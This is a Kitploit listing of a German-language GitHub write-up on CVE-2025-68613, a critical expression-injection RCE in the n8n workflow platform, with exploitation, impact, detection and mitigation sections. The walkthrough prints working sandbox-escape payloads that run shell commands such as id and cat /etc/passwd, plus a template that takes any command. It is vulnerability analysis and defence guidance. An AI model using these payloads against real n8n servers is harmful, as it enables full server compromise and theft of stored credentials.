Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) Kritische RCE-Analyse + defensive Empfehlungen (Patch-Validierung, Erkennungsideen und Härtungstipps) | Kitploit
Tools/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungIncident Response
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) Kritische RCE-Analyse + defensive Empfehlungen (Patch-Validierung, Erkennungsideen und Härtungstipps)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Header Banner

Typing SVG

Severity CVSS Instances Status CWE

Hacker GIF Matrix GIF


Divider

📑 Inhaltsverzeichnis

  • 🎯 Executive Summary
  • 🐛 The Vulnerability
  • 🔬 Technical Analysis
  • 💀 Exploitation Walkthrough
  • 💥 Impact Assessment
  • 🔍 Detection & Response
  • 🛡️ Mitigation Strategy
  • 📚 References

🎯 Executive Summary

Alert GIF

CVE-2025-68613 ist eine kritische Remote-Code-Ausführungsschwachstelle in der Workflow-Automatisierungsplattform n8n, die es authentifizierten Angreifern ermöglicht, durch Expression Injection beliebige Systembefehle auszuführen.


🐛 The Vulnerability

Bug GIF

📋 CVE-Übersicht

🤖 Was ist n8n?

n8n ist eine Open-Source-Workflow-Automatisierungsplattform, die No-Code/Low-Code-Integration mit über 400 Anwendungen ermöglicht. Sie wird häufig eingesetzt in:

🏢 Anwendungsfall

🔧 Technische Ursache

root@kitploit:~
🔓 SCHWACHSTELLENKETTE:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n Expression Language → Dynamische Datenverarbeitung     │
│                           ↓                                     │
│  ⚠️  Unzureichende Sandbox-Isolierung bei serverseitigem Eval  │
│                           ↓                                     │
│  💀 Bösartiger Ausdruck durchbricht Sandbox                    │
│                           ↓                                     │
│  🖥️  Zugriff auf Node.js child_process-Modul                   │
│                           ↓                                     │
│  💥 VOLLSTÄNDIGE RCE - Ausführung von OS-Befehlen              │
└─────────────────────────────────────────────────────────────────┘

🔬 Technical Analysis

Analysis GIF

🎯 Angriffsfläche

Voraussetzungen für die Ausnutzung:

#📋 Anforderung📝 Details
1️⃣Authentifizierung

⚔️ Angriffsmerkmale

🏷️ Attribut📊 Wert🔥 Risiko
KomplexitätNIEDRIG (AC:L)🔴 Hoch

🗺️ Ablaufdiagramm der Schwachstelle

root@kitploit:~
graph TD
    A[🔐 Authentifizierter Benutzer] -->|Erstellt| B[📝 Neuen Workflow]
    B -->|Injiziert| C[💀 Bösartigen Ausdruck]
    C -->|Löst aus| D[⚡ Ausdrucksauswertung]
    D -->|Nutzt aus| E[🔓 Sandbox-Escape]
    E -->|Greift zu| F[🖥️ Node.js-Laufzeit]
    F -->|Führt aus| G[💥 OS-Befehl über child_process]
    G -->|Erreicht| H[☠️ VOLLSTÄNDIGE SERVERKOMPROMITTIERUNG]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 Exploitation Walkthrough

Hacking GIF

⚠️ HINWEIS: Das Folgende dient ausschließlich Bildungszwecken. Unbefugte Ausnutzung ist illegal.

📸 Schritt-für-Schritt-Ausnutzung (Screenshots)

🖥️ Schritt 1: Zugriff auf n8n-Instanz

Erster Zugriff auf die verwundbare n8n-Workflow-Automatisierungsplattform.

n8n Welcome Screen
🔓 n8n Willkommens-Dashboard - Einstiegspunkt


➕ Schritt 2: Neuen Workflow erstellen

Erstellen Sie einen neuen Workflow, der die bösartige Payload enthalten soll.

New Workflow Creation
📝 Neuen Workflow mit „Ersten Schritt hinzufügen“ erstellen


⚡ Schritt 3: Manuellen Trigger hinzufügen

Workflow-Trigger konfigurieren – Manueller Trigger ermöglicht die Ausführung auf Abruf.

Manual Trigger Setup
🎯 Manuellen Trigger für die Workflow-Aktivierung auswählen


📦 Schritt 4: Set-Knoten hinzufügen

Fügen Sie den Knoten „Felder bearbeiten (Set)“ hinzu, der den bösartigen Ausdruck enthalten wird.

Set Node Selection
🔧 Knoten „Felder bearbeiten (Set)“ für die Payload-Injektion hinzufügen


💉 Schritt 5: RCE-Payload injizieren

Der entscheidende Schritt – Injizieren des Sandbox-Escape-Ausdrucks, um RCE zu erreichen.

RCE Payload Execution
💀 Bösartiger Ausdruck führt Befehl 'id' erfolgreich aus!

root@kitploit:~
// 🔴 BÖSARTIGE PAYLOAD (NICHT ILLEGAL VERWENDEN)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

Ausgabe zeigt: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE BESTÄTIGT!


💉 Payload-Beispiele

Code Injection GIF

⚠️ WARNUNG: Diese Payloads sind nur für autorisierte Sicherheitstests. Unbefugte Nutzung ist illegal!

🔹 ID-Befehl (Benutzerinfo)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 PWD-Befehl (Aktuelles Verzeichnis)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

🔹 Datei lesen (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}

🔹 Vorlage für benutzerdefinierte Befehle

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString() })() }}

📸 Datei-Lese-Exploit PoC

passwd file read exploit
💀 Lesen von /etc/passwd – Vollständiger Dateisystemzugriff demonstriert!


📤 Erwartete Ausgabe


🔍 Ursachenanalyse

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 GRUNDURSACHE DER SCHWACHSTELLE                                      │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  Dem n8n-Ausdrucksauswerter FEHLT ein Sanitizer, der verhindert,        │
│  dass Funktionsausdrücke auf Folgendes zugreifen:                       │
│                                                                         │
│    ❌ this.process        → Node.js-Prozessobjekt                       │
│    ❌ mainModule.require  → Modulladesystem                             │
│    ❌ child_process       → Ausführung von OS-Befehlen                  │
│                                                                         │
│  Dies ermöglicht direkten Zugriff auf Systemmodule und willkürliche     │
│  Codeausführung!                                                        │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 Zusammenfassung der Auswirkungen

✅ Abhilfe

Upgrade

root@kitploit:~
# 🛡️ n8n auf gepatchte Version aktualisieren
npm install -g n8n@latest

# Oder mit Docker
docker pull n8n/n8n:1.122.0

🎬 Angriffskill-Chain

☠️ Post-Exploitation-Fähigkeiten


💥 Impact Assessment

Explosion GIF

🔺 CIA-Triad-Analyse

🌍 Exposition in der realen Welt

Vulnerable


🔍 Detection & Response

Detective GIF

🔎 Erkennungsstrategien

🛠️ Versionsaudit-Skript

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 n8n-Versionsaudit

echo "🔍 Prüfe n8n-Version..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  VERWUNDBAR: n8n $VER von CVE-2025-68613 betroffen"
        echo "📦 Erforderlich: Upgrade auf 1.120.4, 1.121.1 oder 1.122.0+"
        exit 2
    else
        echo "✅ SICHER: n8n $VER ist gepatcht"
    fi
else
    echo "❌ n8n nicht in PATH gefunden"
fi

🚨 Checkliste für Incident Response

  • 🔌 Isolieren – Betroffenes n8n vom Netzwerk trennen
  • 💾 Sichern – Protokolle und forensische Artefakte erfassen
  • 🔍 Auditieren – Alle Workflows auf bösartige Ausdrücke prüfen
  • 🔄 Rotieren – Alle zugänglichen Anmeldeinformationen ändern
  • 🔀 Überprüfen – Auf Anzeichen lateraler Bewegung prüfen
  • 📦 Patchen – Vor Wiederherstellung auf sichere Version aktualisieren

🛡️ Mitigation Strategy

Shield GIF

⚡ Sofortmaßnahmen (Priorität 0)

🐳 Beispiel für Container-Härtung

root@kitploit:~
# 🛡️ Gehärtetes n8n-Deployment
FROM n8n/n8n:1.122.0

# 👤 Als Nicht-Root-Benutzer ausführen
USER node

# 🔒 Diese Laufzeit-Flags anwenden:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 Langfristige Sicherheit

🛡️ Maßnahme📝 Umsetzung
🌐 Netzwerksegmentierungn8n-Instanzen isolieren
🔥 WAF-Regeln

💬 Frage an Blue Teamer 🔵

Thinking GIF

Wie würden Sie eine Erkennungsregel entwerfen, um Expression-Injection-Versuche in n8n-Workflow-Definitionen vor der Ausführung zu identifizieren, unter Berücksichtigung der Notwendigkeit, Sicherheit mit legitimer dynamischer Ausdrucksverwendung in Einklang zu bringen?

Bonus: Welche Laufzeitschutzmaßnahmen würden Sie implementieren, um den Explosionsradius zu begrenzen, falls trotz Patchen ein Sandbox-Escape auftritt?


📚 References

Books GIF

📋 Offizielle Advisories

  • 🔗 NVD CVE-2025-68613 Detail
  • 🔗 Snyk Advisory

🔬 Technische Analyse

  • 📖 Orca Security: Kritische n8n RCE
  • 📖 Resecurity: Expression Injection Deep Dive
  • 📖 SecureLayer7: RCE-Ausnutzungsleitfaden

🎮 Praktische Ressourcen

  • 🧪 TryHackMe: CVE-2025-68613 Lab
  • 💀 Öffentlicher PoC-Scanner

🏷️ Tags

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team

Footer

⚠️ HAFTUNGSAUSSCHLUSS: Diese Analyse dient ausschließlich Bildungs- und defensiven Sicherheitszwecken.
Die unbefugte Ausnutzung von Sicherheitslücken ist ILLEGAL.

Author Updated

Profile Views

Tool herunterladen

⚡ Kurzstatistiken

🔥 Metrik📊 Wert
CVSS-Score9.9 / 10
Exponierte Instanzen103.476+
AngriffskomplexitätNIEDRIG
Authentifizierung erforderlichJa (niedrige Rechte)
BenutzerinteraktionKeine

🎯 Wichtige Fakten

📌 Eigenschaft📝 Wert
Veröffentlichung18. Dez. 2025
AngriffsvektorNetzwerk (AV:N)
ScopeGeändert
AuswirkungCIA = HOCH
Exploit-TypExpression Injection
EigenschaftWert
🆔 CVE-IDCVE-2025-68613
📊 CVSS-Score9.9 (Kritisch) 🔴
🔗 CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (Unzureichende Kontrolle dynamisch verwalteter Code-Ressourcen)
📦 Betroffene Versionen0.211.0 → 1.120.3, 1.121.0
✅ Gepatchte Versionen1.120.4, 1.121.1, 1.122.0+
📝 Beschreibung
🔧 DevOpsAutomatisierungspipelines, CI/CD-Integrationen
🛡️ Security OpsSOAR-Workflows, Incident Response
💼 BusinessProzessautomatisierung, Daten-Workflows
📊 DatenETL-Prozesse, API-Integrationen
Gültiges n8n-Benutzerkonto (niedrige Rechte ausreichend)
2️⃣BerechtigungenFähigkeit zur Workflow-Erstellung/-Bearbeitung
3️⃣NetzwerkzugriffErreichbarkeit der n8n-Instanz
Benutzerinteraktion
Nicht erforderlich
🔴 Hoch
ScopeGeändert🔴 Kritisch
🎯 Payload📋 Erwartete Ausgabe
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdVollständige Systembenutzerliste (root, daemon, node, etc.)
envAlle Umgebungsvariablen einschließlich Geheimnisse
ls -la /Root-Dateisystemauflistung
🎯 Auswirkungstyp📝 Beschreibung
💻 Beliebige BefehlsausführungJeden OS-Befehl ausführen
📂 DateisystemzugriffJede Datei lesen/schreiben
🔑 Offenlegung von UmgebungsvariablenAPI-Schlüssel, Geheimnisse preisgegeben
☠️ Vollständige SystemkompromittierungVollständige Serverübernahme
🛡️ Schweregrad📊 Bewertung
CVSS-Score9.9 / 10
AngriffskomplexitätNIEDRIG
Erforderliche BerechtigungenNIEDRIG
BenutzerinteraktionKEINE
Phase🔥 Aktion💀 Auswirkung
1️⃣ErstzugriffBei n8n authentifizieren
2️⃣AusführungBösartigen Workflow einreichen
3️⃣PersistenzReverse-Shell/Backdoor bereitstellen
4️⃣C2Kommando- und Kontrollkanal einrichten
5️⃣AktionenDaten exfiltrieren, laterale Bewegung
🎯 Aktion💥 Auswirkungsstufe
🔑 Credential-DiebstahlAPI-Schlüssel, OAuth-Tokens, DB-Passwörter extrahieren
📤 DatenexfiltrationWorkflow-Daten, Ausführungsprotokolle, Geschäftsinformationen
🔒 PersistenzCron-Jobs, Startskripte, Web-Shells
🔀 Laterale BewegungAuf Datenbanken, CI/CD, Cloud-Infrastruktur ausweiten
🗑️ Workflow-ManipulationAutomatisierungslogik ändern/zerstören

🔴 Vertraulichkeit (HOCH)

  • 🔑 API-Schlüssel offengelegt
  • 🔐 OAuth-Tokens geleakt
  • 💾 DB-Passwörter zugänglich
  • 📜 Ausführungsprotokolle kompromittiert

🟠 Integrität (HOCH)

  • 📝 Workflows verändert
  • ⚙️ Automatisierung korrumpiert
  • 💉 Bösartige Knoten injiziert
  • 📊 Daten manipuliert

🟡 Verfügbarkeit (HOCH)

  • ⏹️ Dienste gestört
  • 💀 Ressourcen erschöpft
  • 🔄 Workflows beendet
  • 🖥️ Infrastruktur ausgefallen
#📋 Methode🔍 Was zu überwachen ist
📜ProtokollanalyseUngewöhnliche Befehle vom n8n-Prozess, fehlgeschlagene Ausdrücke
🌐NetzwerkAusgehende Verbindungen zu unbekannten IPs, große POST-Anfragen
⚡LaufzeitAufrufe von child_process, unerwartete Spawns
📦VersionsauditGegen verwundbare Versionen prüfen
🔢 Priorität🛠️ Aktion📝 Details
🔴 P0JETZT PATCHENUpgrade auf 1.120.4, 1.121.1 oder 1.122.0+
🟠 P1Zugriff einschränkenWorkflow-Erstellung auf vertrauenswürdige Benutzer beschränken
🟡 P2Container härtenMit Sicherheitseinschränkungen bereitstellen
Ausdrucksmuster überwachen
📜 Audit-LoggingUmfassende Protokollierung aktivieren
🔍 SicherheitsüberprüfungenRegelmäßige Workflow-Bewertungen
🔓 Least PrivilegeZugriffskontrollen durchsetzen